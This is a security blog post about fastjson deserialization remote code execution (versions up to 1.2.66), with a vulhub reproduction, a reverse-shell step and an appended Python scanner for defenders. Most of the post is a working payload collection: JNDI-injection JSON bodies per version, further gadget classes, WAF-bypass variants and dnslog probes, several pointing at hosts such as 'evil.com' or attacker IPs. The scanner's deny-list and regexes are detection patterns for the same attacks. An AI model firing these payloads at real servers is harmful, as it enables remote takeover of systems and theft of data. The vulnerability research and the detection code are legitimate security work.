fastjson remote code execution vulnerability

Disclaimer:

This article is for learning and research only. Using its contents to perform illegal operations against other applications on the Internet is strictly prohibited; if you use it for illegal purposes you bear the consequences yourself, and any resulting risk has nothing to do with the author. By continuing to read this article you agree to abide by these terms.

Fastjson 1.2.24 remote code execution vulnerability

Vulnerability description

The FastJson library is a JSON library for Java: it serializes Java objects into JSON and deserializes JSON back into Java objects. On 15 March 2017 the fastjson maintainers themselves disclosed a high-severity remote code execution vulnerability affecting fastjson 1.2.24 and earlier. An attacker can use it to execute malicious code remotely and compromise the server.

Prerequisites

autoType enabled

Affected versions

  • fastjson 1.2.22-1.2.24
  • JDK 1.7 and 1.8

Reproduction

Fastjson provides deserialization that lets the sender of a JSON string name an arbitrary class to deserialize into through the value of the "@type" key, and while binding the data it invokes that object's setter/getter methods by default. With the JdbcRowSetImpl class, the setAutoCommit method performs a JNDI lookup on the dataSourceName member, which is what produces the JNDI injection.

payload:

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://127.0.0.1:1099/jfzn6t",
        "autoCommit":true
    }
}
  • @type: the target class to deserialize into;
  • dataSourceName: the malicious remote class reference;
  • autoCommit: triggers the setAutoCommit method.

1. Start the target environment with vulhub.
2. Send a POST request with Content-Type set to application/json.
3. Start a JNDI service and an nc listener for the reverse shell, then wait for the shell to call back.
4. The reverse shell is received successfully.

Fastjson <= 1.2.47 remote code execution vulnerability

In the releases after 1.2.24, fastjson set the autoTypeSupport property to false by default and added the checkAutoType() function, which defends against deserialization attacks with a blacklist and a whitelist. The PoC below still gets through because deserializing the java.lang.Class entry loads the class named in val and caches it, and checkAutoType consults that cache before applying the blacklist, so the JdbcRowSetImpl named in the second entry is accepted.

PoC:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}


PoCs for various Fastjson versions

version < 1.2.51, remote command execution

1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

Unknown version (between 1.2.24 and 1.2.41)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.41 
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.42 
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

1.2.43 
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

1.2.45 
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

1.2.47 
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}

fastjson<=1.2.62
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://x.x.x.x:9999/exploit"}";

fastjson <= 1.2.66
Note: these require autoTypeSupport to be true (the default is false for fastjson >= 1.2.25).
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}

# Other gadget classes
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"JNDI_SERVER"}

{"@type":"ch.qos.logback.core.db.JNDIConnectionSource","jndiLocation":"JNDI_SERVER"}

{"@type":"org.apache.openjpa.ee.JNDIManagedRuntime","transactionManagerName":"JNDI_SERVER","rollbackOnly":null}

{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"JNDI_SERVER","rollbackOnly":null}

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"JNDI_SERVER"}

{"@type":"org.apache.commons.configuration2.JNDIConfiguration","prefix":"JNDI_SERVER"}

{"@type":"oracle.jdbc.rowset.OracleJDBCRowSet","dataSourceName":"JNDI_SERVER","command":"test"}

WAF bypass tricks

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit",""autoCommit":true}
{"@type":"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.42
{"@type":"[com.sun.rowset.RowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.25v1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties""data_source":"rmi://localhost:1099/Exploit"}} 1.2.25
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://127.0.0.1:1099/Exploit\"}1.2.60
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.60
{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.61
{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"rmi://localhost:1099/Exploit\"}  1.2.62
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}} JtaTransactionConfig

Detecting whether fastjson is present

Error echo

Leave a curly brace unclosed so the parser throws; the error message may contain the string "fastjson".

Detection with dnslog

{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://dnslog"}}""}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
Set[{"@type":"java.net.URL","val":"http://dnslog"}]
Set[{"@type":"java.net.URL","val":"http://dnslog"}
{{"@type":"java.net.URL","val":"http://dnslog"}:0
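As an added defender-side example (not part of the original post), the scanner below runs over raw request bodies and flags the patterns this post describes: an @type naming one of the JNDI-capable classes listed above, the java.lang.Class/val cache trick used against 1.2.47, the L...; and [ descriptor variants from the WAF-bypass list, and the java.net.* dnslog probes. The deny-list is a constructed subset of the classes on this page and the sample bodies are constructed; a real deployment should upgrade fastjson and rely on its safeMode rather than on pattern matching.

```python
import re

# Subset of the gadget classes named on this page (assumption: a real
# deployment should rely on fastjson's own safeMode/denyList, not this).
JNDI_GADGETS = {
    "com.sun.rowset.JdbcRowSetImpl", "com.sun.rowset.RowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "org.apache.shiro.jndi.JndiObjectFactory",
    "br.com.anteros.dbcp.AnterosDBCPConfig",
    "com.zaxxer.hikari.HikariConfig",
}
# Classes the page uses for out-of-band (dnslog) fingerprinting.
PROBE_CLASSES = {"java.net.URL", "java.net.Inet4Address",
                 "java.net.Inet6Address", "java.net.InetSocketAddress"}
# Raw-text regexes: several page payloads are malformed JSON or quote-escaped.
TYPE_RE = re.compile(r'@type\\?"\s*:\s*\\?"([^"\\]+)')
VAL_RE = re.compile(r'"val\\?"\s*:\s*\\?"([^"\\]+)')
JNDI_RE = re.compile(r'\b(?:rmi|ldap|ldaps|iiop)://', re.IGNORECASE)

def normalize_type(name):
    """Undo the descriptor tricks from the WAF-bypass list: a leading
    '[' (array form) and one or more 'L...;' wrappers."""
    name = name.strip().lstrip("[")
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name

def scan_body(body):
    """Return sorted finding tags for one request body (raw text)."""
    findings = []
    types = {normalize_type(t) for t in TYPE_RE.findall(body)}
    vals = set(VAL_RE.findall(body))
    findings += ["jndi-gadget:" + t for t in types & JNDI_GADGETS]
    # 1.2.47 trick: java.lang.Class whose "val" names a gadget class
    if "java.lang.Class" in types:
        findings += ["class-cache:" + v for v in vals & JNDI_GADGETS]
    if JNDI_RE.search(body):
        findings.append("jndi-url")
    findings += ["oob-probe:" + t for t in types & PROBE_CLASSES]
    return sorted(findings)

SAMPLES = [  # constructed bodies in the forms this page shows, plus a benign one
    '{"name":"alice"}',
    '{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://127.0.0.1:1099/x","autoCommit":true]}',
    '{"@type":"java.net.Inet4Address","val":"dnslog"}',
]
if __name__ == "__main__":
    for body in SAMPLES:
        print(body[:40], "->", scan_body(body))
```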


Posted 2022-11-15 20:38 by 知冰